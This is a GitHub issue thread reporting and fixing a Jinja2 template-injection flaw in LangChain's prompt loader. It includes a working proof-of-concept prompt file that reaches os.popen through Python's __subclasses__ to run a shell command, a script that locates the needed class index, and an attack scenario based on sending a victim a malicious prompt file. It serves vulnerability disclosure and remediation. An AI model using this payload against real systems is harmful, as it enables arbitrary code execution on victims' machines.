
Template injection to arbitrary code execution #4394

Closed
2 of 14 tasks
r3pwnx opened this issue May 9, 2023 · 4 comments · Fixed by #10252

Comments


r3pwnx commented May 9, 2023

System Info

Windows 11

Who can help?

No response

Information

  • The official example notebooks/scripts
  • My own modified scripts

Related Components

  • LLMs/Chat Models
  • Embedding Models
  • Prompts / Prompt Templates / Prompt Selectors
  • Output Parsers
  • Document Loaders
  • Vector Stores / Retrievers
  • Memory
  • Agents / Agent Executors
  • Tools / Toolkits
  • Chains
  • Callbacks/Tracing
  • Async

Reproduction

  1. Save the following data to pt.json:
{
    "input_variables": [
        "prompt"
    ],
    "output_parser": null,
    "partial_variables": {},
    "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
    "template_format": "jinja2",
    "validate_template": true,
    "_type": "prompt"
}
  2. Run:
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
  3. The dir command will be executed.
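The gadget chain in the payload is plain Python introspection; nothing in it is specific to LangChain. A minimal stdlib sketch of why the template expression can reach os.popen:

```python
# Sketch (stdlib only): a template engine that evaluates expressions lets an
# attacker walk from a string literal to every loaded class and its globals.
import os  # ensure os is imported so its classes appear among the subclasses

base = ''.__class__.__bases__[0]      # str -> object
assert base is object
subs = base.__subclasses__()          # every class loaded in the interpreter

# Classes defined in the os module (e.g. os._wrap_close) carry os's module
# globals, which include os.popen -- the function the payload ultimately calls.
leaky = [c for c in subs
         if 'popen' in getattr(getattr(c, '__init__', None), '__globals__', {})]
```

Any entry in leaky gives a path from an ordinary string to a shell-spawning function, which is exactly what the template above exploits.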

Attack scenario: Alice sends a prompt file to Bob and convinces Bob to load it.
Analysis: Jinja2 is used to render prompts, and the environment is not sandboxed, so template injection leads to arbitrary code execution.
Note: in pt.json the template carries the payload; the index into __subclasses__ may differ between environments.
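For contrast, LangChain's default "f-string" template format goes through str.format, whose replacement fields allow only attribute and index lookups, never calls. A small stdlib sketch (not LangChain code):

```python
# str.format substitutes data but cannot evaluate expressions, so the
# jinja2 payload above would fail to parse rather than execute.
template = "Tell me a {prompt}"
result = template.format(prompt="What is 1 + 1?")

# A call inside a replacement field is not valid format-string syntax:
try:
    "{x()}".format(x=len)
    call_allowed = True
except (KeyError, ValueError):
    call_allowed = False
```

Note that str.format still permits attribute access such as "{0.__class__}", so formatting untrusted templates is risky in general; the difference is that it offers no direct path to calling functions.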

Expected behavior

Code should not be executed.


r3pwnx commented May 9, 2023

The index into __subclasses__ can be obtained in the following way:

target = 'popen'
# Walk every class loaded in the interpreter and report those whose
# __init__ globals expose the target name (e.g. os.popen).
for num, cls in enumerate(''.__class__.__bases__[0].__subclasses__()):
    try:
        if target in cls.__init__.__globals__:
            print(cls, num)
    except AttributeError:
        # Builtins inherit object.__init__, a slot wrapper with no __globals__.
        pass


The dosubot bot added the stale label on Aug 29, 2023; obi1kenobi removed it the same day.
obi1kenobi (Collaborator) commented

Sorry for the bot reply, it's still a beta and shouldn't be attempting to close security-related issues like this. I'm triaging this right now and should have an update shortly.

obi1kenobi (Collaborator) commented

Issue confirmed, escalating to security@langchain.dev.

Apologies for the delay here. This issue slipped through the cracks, which should not have happened. We're going to use this instance as an internal case study to make sure we do way better in the future.

We've already added a SECURITY.md to the repo so that GitHub directs users to send security-related information to security@langchain.dev to ensure any security-related issues are promptly acted upon: #9551

We're also looking at automation to help us detect security-related issues opened on public GitHub, so we can escalate them internally to security@langchain.dev more effectively.

obi1kenobi added a commit that referenced this issue Sep 5, 2023
jinja2 templates are not sandboxed and are at risk for arbitrary code
execution. To mitigate this risk:
- We no longer support loading jinja2-formatted prompt template files.
- `PromptTemplate` with jinja2 may still be constructed manually, but
  the class carries a security warning reminding the user to not pass
  untrusted input into it.

Resolves #4394.
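The load-time half of that mitigation can be sketched as a guard that refuses jinja2-formatted prompt files. This is hypothetical code, not LangChain's actual implementation; load_prompt_config and the error message are illustrative only:

```python
import json

def load_prompt_config(path):
    """Load a prompt template config, rejecting the unsafe jinja2 format.

    Hypothetical guard mirroring the fix described above: jinja2 templates
    are not sandboxed, so they must never be loaded from untrusted files.
    """
    with open(path) as f:
        config = json.load(f)
    if config.get("template_format") == "jinja2":
        raise ValueError(
            "Loading jinja2-formatted prompt templates from files is "
            "disabled: jinja2 is not sandboxed and allows arbitrary "
            "code execution."
        )
    return config
```

Manually constructed jinja2 templates bypass a guard like this by design, which is why the second half of the fix attaches a security warning to the class itself.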
obi1kenobi added a commit that referenced this issue Oct 10, 2023, and hoanq1811 pushed a commit to hoanq1811/langchain that referenced this issue Feb 2, 2024, both with the same message as above.